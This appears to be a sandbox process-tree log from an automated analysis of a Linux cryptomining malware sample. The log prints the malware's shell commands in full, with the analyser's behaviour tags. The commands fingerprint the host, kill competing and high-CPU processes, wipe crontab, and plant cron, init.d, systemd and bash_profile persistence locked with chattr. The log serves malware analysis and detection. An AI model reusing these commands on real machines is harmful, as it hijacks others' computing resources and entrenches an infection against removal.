/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3151
-
/usr/bin/whoamiwhoami3⤵PID:3162
-
-
/usr/bin/hostnamehostname3⤵PID:3163
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3164
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3182
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3184
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3183
-
-
/usr/bin/idid -u3⤵PID:3186
-
-
/usr/bin/grepgrep -v grep3⤵PID:3189
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3188
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3187
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3191
-
/usr/bin/idid -u3⤵PID:3192
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:3197
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:3196
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:3195
-
-
/usr/bin/grepgrep -v grep3⤵PID:3194
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3193
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:3199
-
/usr/bin/idid -u3⤵PID:3200
-
-
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:3154
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3156
-
/usr/bin/headhead -n 11⤵PID:3160
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3161
-
/usr/bin/grepgrep "Port "1⤵PID:3159
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3158
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3167
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3170
-
/usr/bin/cutcut -d: -f21⤵PID:3168
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3169
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3175
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3178
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3181
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3202
-
/usr/bin/grepgrep -v grep1⤵PID:3203
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3205
-
/usr/bin/wcwc -l1⤵PID:3206
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3204
-
/usr/bin/crontabcrontab -r1⤵PID:3269
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
PID:3271
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
- Reads runtime system information
PID:3273
-
/usr/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3274
-
/usr/bin/crontabcrontab -2⤵PID:3276
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
- Attempts to change immutable files
PID:3277
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:3279
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3280
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3281
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3282
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:3283
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:3284
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵
- Attempts to change immutable files
PID:3285
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3286
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3287
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3288
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3289
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:3290
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3292
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3293
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3294 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3299
-
/usr/bin/whoamiwhoami3⤵PID:3310
-
-
/usr/bin/hostnamehostname3⤵PID:3311
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3312
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3328
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3330
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
PID:3329
-
-
/usr/bin/idid -u3⤵PID:3332
-
-
/usr/bin/grepgrep -v grep3⤵PID:3335
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3334
-
-
/usr/bin/psps x3⤵PID:3333
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:3337 -
/usr/bin/idid -u3⤵PID:3338
-
-
/usr/bin/idid -u3⤵PID:3339
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:3340
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:3341
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:3342
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:3343
-
-
/usr/bin/idid -u3⤵PID:3344
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:3345
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:3346
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
PID:3347
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:3348
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:3349
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3351
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3352
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3353
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3354
-
-
/usr/bin/whichwhich chkconfig3⤵PID:3355
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:3356
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
PID:3357
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵PID:3358
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3359
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3359
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3359
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
PID:3359
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3385
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3385
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3385
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3385
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:3411
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3412
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3412
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3412
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3412
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:3438
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:3439
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3441
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3442
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:3443
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:3444
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:3499
-
-
/usr/bin/whichwhich systemctl3⤵PID:3500
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
PID:3501
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:3502
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:3503
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:3505
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
PID:3506
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3507
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
PID:3508
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:3535
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:3568
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
PID:3597
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:3302
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3304
-
/usr/bin/headhead -n 11⤵PID:3308
-
/usr/bin/grepgrep "Port "1⤵PID:3307
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3309
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3306
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3317
-
/usr/bin/cutcut -d: -f21⤵PID:3316
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3318
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3315
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3321
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3324
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3327
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3670 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
PID:3694 -
/usr/bin/whoamiwhoami3⤵PID:3705
-
-
/usr/bin/hostnamehostname3⤵PID:3706
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3707
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3723
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3725
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:3724
-
-
/usr/bin/idid -u3⤵PID:3727
-
-
/usr/bin/grepgrep -v grep3⤵PID:3730
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3729
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3728
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3732
-
/usr/bin/idid -u3⤵PID:3733
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:3738
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:3737
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:3736
-
-
/usr/bin/grepgrep -v grep3⤵PID:3735
-
-
/usr/bin/psps aux3⤵PID:3734
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:3742
-
/usr/bin/idid -u3⤵PID:3743
-
-
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:3697
-
